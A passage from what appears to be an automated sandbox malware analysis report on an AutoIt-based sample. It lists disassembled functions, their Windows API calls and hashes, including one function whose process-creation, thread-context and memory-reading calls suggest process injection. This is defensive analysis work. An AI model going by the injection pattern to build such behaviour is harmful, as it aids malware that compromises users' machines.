                              • IsThemeActive.UXTHEME ref: 00884992
                                • Part of subcall function 008A35AC: __lock.LIBCMT ref: 008A35B2
                                • Part of subcall function 008A35AC: DecodePointer.KERNEL32(00000001,?,008849A7,008D81BC), ref: 008A35BE
                                • Part of subcall function 008A35AC: EncodePointer.KERNEL32(?,?,008849A7,008D81BC), ref: 008A35C9
                                • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00884A73
                                • Part of subcall function 00884A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00884A88
                                • Part of subcall function 00883B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00883B7A
                                • Part of subcall function 00883B4C: IsDebuggerPresent.KERNEL32 ref: 00883B8C
                                • Part of subcall function 00883B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009462F8,009462E0,?,?), ref: 00883BFD
                                • Part of subcall function 00883B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00883C81
                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008849D2
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                              • String ID:
                              • API String ID: 1438897964-0
                              • Opcode ID: ed4492009d61d8bf8e546f80bc133a11eddc77e15771a87e4eba2860999c7b9f
                              • Instruction ID: 28d737606b2a7257e99931a482a85238fc9d0471fd4c13582fd68f3bcf1a5572
                              • Opcode Fuzzy Hash: ed4492009d61d8bf8e546f80bc133a11eddc77e15771a87e4eba2860999c7b9f
                              • Instruction Fuzzy Hash: 551188B1928315ABC300EF68EC45D1AFBE8FB96710F00451AF091C32B1DBB09648DB92
                              Function 00885DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00885981,?,?,?,?), ref: 00885E27
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00885981,?,?,?,?), ref: 008BE19C
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 2211f8ec41a23dfecc325cf21ae1d002e9d72dce712ef1a74af7147483135763
                              • Instruction ID: 9a25bbef271173c30e187b18d3509495a2fa68fd18146eedfa24eb43acb56313
                              • Opcode Fuzzy Hash: 2211f8ec41a23dfecc325cf21ae1d002e9d72dce712ef1a74af7147483135763
                              • Instruction Fuzzy Hash: 06017570244709BEF7645E28CC8AFA63B9CFB0576CF108319BAE59A1E0C6B45E498B50
                              Function 008A0FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A594C: __FF_MSGBANNER.LIBCMT ref: 008A5963
                                • Part of subcall function 008A594C: __NMSG_WRITE.LIBCMT ref: 008A596A
                                • Part of subcall function 008A594C: RtlAllocateHeap.NTDLL(01150000,00000000,00000001,00000000,?,?,?,008A1013,?), ref: 008A598F
                              • std::exception::exception.LIBCMT ref: 008A102C
                              • __CxxThrowException@8.LIBCMT ref: 008A1041
                                • Part of subcall function 008A87DB: RaiseException.KERNEL32(?,?,?,0093BAF8,00000000,?,?,?,?,008A1046,?,0093BAF8,?,00000001), ref: 008A8830
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                              • String ID:
                              • API String ID: 3902256705-0
                              • Opcode ID: a6f36035d931d83b9368571be40e0eb1cb23c7f6f704b7de09b4ffd24d92263d
                              • Instruction ID: 21330179613f07a357f1d6e33b67e04ba139c197e6cf9ee5af678c0aa93c02ec
                              • Opcode Fuzzy Hash: a6f36035d931d83b9368571be40e0eb1cb23c7f6f704b7de09b4ffd24d92263d
                              • Instruction Fuzzy Hash: 94F0813550471DA6EF21BB5CEC0A9DF7BA8FF02350F100425F904E6991EFB18AD086A2
                              Function 008A582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __lock_file_memset
                              • String ID:
                              • API String ID: 26237723-0
                              • Opcode ID: f65520a447ff17e4be5ecc27f91e27a97a1141341d0060815c72d8624358b8ea
                              • Instruction ID: d3f5cc68ee5251e0d489bacb0163fbc2f88664bf7e157dc52d2f4b31a0d86cc3
                              • Opcode Fuzzy Hash: f65520a447ff17e4be5ecc27f91e27a97a1141341d0060815c72d8624358b8ea
                              • Instruction Fuzzy Hash: DD018871C00609EBEF11AF6D8C0559F7B61FF42760F144225F814DB561DB358A61DB62
                              Function 008A55D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                              Download Yara Rule
                              APIs
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              • __lock_file.LIBCMT ref: 008A561B
                                • Part of subcall function 008A6E4E: __lock.LIBCMT ref: 008A6E71
                              • __fclose_nolock.LIBCMT ref: 008A5626
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: 0bf8525f85c018c316413f0312696bbd02fdcfd610494c0d828584afd089b4fc
                              • Instruction ID: 1c3ff1106eb58e8b1420650b1e4206bba1b8c39f8aa27283759c5a648eb88978
                              • Opcode Fuzzy Hash: 0bf8525f85c018c316413f0312696bbd02fdcfd610494c0d828584afd089b4fc
                              • Instruction Fuzzy Hash: 35F09071800A05DAF720AF7D880276E77A1FF53334F658209E414EB9C1CF7C89829B66
                              Function 0110129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                              Download Yara Rule
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 01101A5B
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01101AF1
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01101B13
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659776671.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1100000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                              • Instruction ID: 7d19ceca2238166eb3a2740e37258eb9c640c8a28031f7b155c8b71ac9f1dd5b
                              • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                              • Instruction Fuzzy Hash: E112BE24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                              Function 00892123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 087ae516c63b05d26d136ea39db580e022ed4281938c0d90ce38026419ce4926
                              • Instruction ID: ba18474d58bf71c0d30e909c7c2803c9fc2b2d055cf688da9ceafd678e304cc0
                              • Opcode Fuzzy Hash: 087ae516c63b05d26d136ea39db580e022ed4281938c0d90ce38026419ce4926
                              • Instruction Fuzzy Hash: 45515C35600614AFCF14FB68C991FAE77A6FF85314F188168F946EB392DA30ED148B52
                              Function 00885C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                              Download Yara Rule
                              APIs
                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00885CF6
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 54326fe2b1a5034384283e183be0ee2788f369007d8ee1b27896f13866864f90
                              • Instruction ID: 09b32e8564802c9eb1a94cf1df3908ab28b4ac67836fdec7814e73cc543c7689
                              • Opcode Fuzzy Hash: 54326fe2b1a5034384283e183be0ee2788f369007d8ee1b27896f13866864f90
                              • Instruction Fuzzy Hash: 32313971A00B09AFCB18EF2DC484AADB7B6FF48310F248629E819D3714D771B960DB91
                              Function 008C00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 72c64f0ebe4fda386f607f716108b9385f20bb7f1e042ef16c590e5fe6474cc5
                              • Instruction ID: 5dc32ce9481e1ba7690a45d9d65c6e74c50a55d15aec90f1598a7bed84b5b3d2
                              • Opcode Fuzzy Hash: 72c64f0ebe4fda386f607f716108b9385f20bb7f1e042ef16c590e5fe6474cc5
                              • Instruction Fuzzy Hash: AE41E474508341CFDB24DF18C494B1ABBE0FF45358F19899DE89A8B7A2C376E845CB52
                              Function 008880D7 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                              • Instruction ID: 76ebc42a498a23e6cc09cb6e6d847580fd527e4606efc6eaeadb58b02cc61695
                              • Opcode Fuzzy Hash: 46acc021f7701719685bd31058d1bf319928b5265fe0d6ec76a5632e42df60c5
                              • Instruction Fuzzy Hash: 72115E79204605DFD724DF2CD481916B7E9FF49354B60C82EE88ACB761DB32E841CB50
                              Function 00884F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00884D13: FreeLibrary.KERNEL32(00000000,?), ref: 00884D4D
                                • Part of subcall function 008A548B: __wfsopen.LIBCMT ref: 008A5496
                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884F6F
                                • Part of subcall function 00884CC8: FreeLibrary.KERNEL32(00000000), ref: 00884D02
                                • Part of subcall function 00884DD0: _memmove.LIBCMT ref: 00884E1A
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Library$Free$Load__wfsopen_memmove
                              • String ID:
                              • API String ID: 1396898556-0
                              • Opcode ID: 980f5b270dbf498f3c55d701660640bf26a3bfc969ca54a2c41f0c0f6825387f
                              • Instruction ID: 3d7cccf1c7c8d265193749d49a8c6ceb1ddeb3bcba7413ef76563b7e19942468
                              • Opcode Fuzzy Hash: 980f5b270dbf498f3c55d701660640bf26a3bfc969ca54a2c41f0c0f6825387f
                              • Instruction Fuzzy Hash: C811C43260070AABCB10FF78D812FAE77A9FF44704F10842DF541E62C1DEB59A059B52
                              Function 008C01AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: ad4f42a272351368e739cf1b5041bc68317dccbd1b868a5dc61e7ba3de6bc643
                              • Instruction ID: 347d29bf417d0aa8d024b0d94d35c77cb6d2742ee80a74d930a257f499c71cf7
                              • Opcode Fuzzy Hash: ad4f42a272351368e739cf1b5041bc68317dccbd1b868a5dc61e7ba3de6bc643
                              • Instruction Fuzzy Hash: 8B21FF74508341CFDB28EF54C484A1ABBE0FF85744F058969E89A87B61D731E845CB52
                              Function 00885D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                              Download Yara Rule
                              APIs
                              • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00885807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00885D76
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                              • Instruction ID: 346ec799391c137fd9fee56e92d436cd2725e1ddaa574a1596d4126110cd4c02
                              • Opcode Fuzzy Hash: 08e199c7ba5d5ba3c6f331a27474ae4e417439ccb2b1fc180350a71819120327
                              • Instruction Fuzzy Hash: 62113631204B059FE3309F15C888B66B7E9FF45764F10C92EE8AACAA50D7B1F945CB60
                              Function 008A4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              • __lock_file.LIBCMT ref: 008A4AD6
                                • Part of subcall function 008A8D68: __getptd_noexit.LIBCMT ref: 008A8D68
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2597487223-0
                              • Opcode ID: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                              • Instruction ID: 77f1670846e49f12499f92f79382e5f2c2f4767c71e9f43659501151c4c24dbf
                              • Opcode Fuzzy Hash: 0aae02372a1b3f1b3f44026926d6593bd1d6fedc600c63804f0bd2c489d2806c
                              • Instruction Fuzzy Hash: 85F0F431800209DFFF51AFB88C0639F3660FF42325F084114B414EA4D1CBB88921CF62
                              Function 00884FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • FreeLibrary.KERNEL32(?,?,009462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884FDE
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 1ec26de9f5ce7856fa256814d8426dc4b1e2a90d972fd0190cefaade23ebdf5b
                              • Instruction ID: ceba0b1cf1c54a5b69a144d6c7e16af6ff6130f42797fa03d4d5873190ca4462
                              • Opcode Fuzzy Hash: 1ec26de9f5ce7856fa256814d8426dc4b1e2a90d972fd0190cefaade23ebdf5b
                              • Instruction Fuzzy Hash: 38F03072509712CFCB34AF64D494812BBE1FF153293209A3EE2D6C2A11CB329844DF40
                              Function 008A09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008A09F4
                                • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: LongNamePath_memmove
                              • String ID:
                              • API String ID: 2514874351-0
                              • Opcode ID: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                              • Instruction ID: 9f7802f6e61f42cb898c992560f9fa3931322216d70243f548296ae21d8c0854
                              • Opcode Fuzzy Hash: a58f6fd98879b8a47461ac0592b6d9867c59fecbbb2288d5e79bce2527b0e7f7
                              • Instruction Fuzzy Hash: 91E0CD379042285BCB20E65C9C05FFA77EDEF887A0F0401B5FC0CD7309D964AD818691
                              Function 008E9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: __fread_nolock
                              • String ID:
                              • API String ID: 2638373210-0
                              • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                              • Instruction ID: 955c26bd580cd69d5fc89b99fe78a29d61c66e078036cc17d01dec1604891ac9
                              • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                              • Instruction Fuzzy Hash: A9E092B0114B405FD7348A24D8107E373E0FB06315F00081CF2DAC3341EBA6B8818759
                              Function 00885DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                              Download Yara Rule
                              APIs
                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,008BE16B,?,?,00000000), ref: 00885DBF
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.000000000090F000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659531706.0000000000935000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659580811.000000000093F000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1659597840.0000000000948000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_880000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                              • Instruction ID: 42362ae14654dc33df8ccccd1dc978e49bc84892af1af551c9b61a8d46ca79e1
                              • Opcode Fuzzy Hash: 23ccb305067742b1285db303903b9de3d759935453c6a3796ae2c76cbeadb786
                              • Instruction Fuzzy Hash: 31D0C77465420CBFE710DB80DC46FA9777CD705710F100194FD0456690D6B27E509795
                              Function 008A548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1659464678.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                              • Associated: 00000000.00000002.1659450931.0000000000880000.00000002.00000001.01000000.00000003.sdmpDownload File
